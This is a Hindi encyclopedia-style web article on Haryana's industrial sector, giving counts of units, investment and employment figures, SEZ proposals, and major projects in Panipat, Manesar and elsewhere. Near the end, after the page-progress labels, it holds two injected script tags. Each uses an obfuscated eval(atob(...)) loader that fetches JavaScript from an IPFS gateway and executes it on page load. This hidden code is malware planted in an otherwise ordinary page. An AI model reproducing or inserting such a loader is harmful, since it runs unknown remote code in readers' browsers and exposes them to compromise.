हरियाणा के उद्योग

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
ट्रिडेंट होटल, गुड़गांव
Trident Hotel, Gurgaon

हरियाणा का औद्योगिक क्षेत्र बहुत ही विस्तृत और विशाल है। राज्य में 1,343 बड़ी और 80,000 लघु उद्योग इकाइयां कार्यरत हैं। हरियाणा में बहुत सी वस्तुओं का उत्पादन होता है। कार, ट्रैक्टर, मोटरसाइकिल, साइकिल, रेफ्रिजरेटर, वैज्ञानिक उपकरण आदि अनेक प्रकार के उत्पादकों का सबसे बड़ा उत्पादक राज्य हरियाणा है। विश्व बाज़ार में बासमती चावल का सबसे बड़ा निर्यातक हरियाणा है। पंचरंगा अचार के अतिरिक्त पानीपत में हथकरघे से बनी वस्तुएं और कालीन विश्व भर में प्रसिद्ध है और इनका निर्यात बड़े स्तर पर किया जाता है।

जुलाई, 1991 से अब तक 3828 औद्योगिक उद्यमियों से ज्ञापन जमा किए गए और 2228 ज्ञापन क्रियांवित कर दिए गए हैं। इन ज्ञापनों में 21,578 करोड़ रुपये का निवेश किया गया और 3,92,237 लोगों को रोज़गार मिल गया है। नवीन औद्योगिक नीतियों के परिणामस्वरूप 'विशेष आर्थिक क्षेत्र' (सेज) स्थापित करने के 94 प्रस्ताव राज्य को प्राप्त हुए हैं जिसके अनुसार औद्योगिक ढांचे पर 2 करोड़ रुपये की लागत आएगी। इन परियोजनाओं के क्रियान्वयन के बाद कई हज़ार करोड़ रुपये मानेसर के विस्तार के अतिरिक्त फ़रीदाबाद, रोहतक और जगाधरी को औद्योगिक आदर्श नगर के रूप में विकसित किया जा रहा है। पानीपत में 33,000 करोड़ रुपये से 'पैट्रो रसायन केंद्र' स्थापित किया गया है। 2,000 करोड़ रुपये लगा कर कुंडल-मानेसर-पलवल एक्सप्रेस राजमार्ग का विकास हो रहा है। इस राजमार्ग के आसपास अनेक आर्थिक केंद्र बनाये जायेगें जिससे औद्योगिक और सेवा क्षेत्र में निवेश के अवसर उपलब्ध होंगे। बहादुरगढ़ और रोहतक में नये औद्योगिक विकास तथा सोनीपत, कुंडली, राई और बाड़ी में उद्योगों का विकास करके आर्थिक विकास को बढ़ाया जा रहा है। राज्य सरकार अंबाला, साहा, यमुनानगर, बरवाल, करनाल, रोहतक और कैथल आदि शहरों का औद्योगिकरण करने को प्रयासरत हैं। यह भी उल्लेखनीय है कि राज्य में कुछ औद्योगिक निवेश पंजाबी उद्यमियों ने किया है, जिसका मानना है कि पंजाब के बजाय हरियाणा में निवेश करना अधिक सुरक्षित और लाभदायक है (क्योंकि दिल्ली के बाज़ार से यह नज़दीक है)।

'हरियाणा राज्य औद्योगिक विकास निगम' और 'हरियाणा नगर विकास प्राधिकरण' द्वारा विकसित औद्योगिक क्षेत्रों में भूमि आबंटन की बहुत मांग है। वर्तमान समय में 94 बड़ी तथा 5031 लघु औद्योगिक इकाइयों की स्थापना हुई है जिन पर 4124 करोड़ रुपये का निवेश हुआ है और 92,559 लोगों को रोज़गार मिला है। इसके अतिरिक्त अनेक औद्योगिक इकाइयों का विस्तार करने से 35,000 करोड़ रुपये से अधिक का नया निवेश हुआ है। 'भारतीय तेल निगम' ने पानीपत में 5,000 करोड़ रुपये के निवेश से पैरेक्सीलीन/पीटीए की स्थापना की है। मारूति उद्योग, हीरो होंडा और अनेक ऑटोमोबाइल उद्योगों का बहुत विस्तार हुआ है जिन पर लगभग 10,000 करोड़ रुपये लगाये गये हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>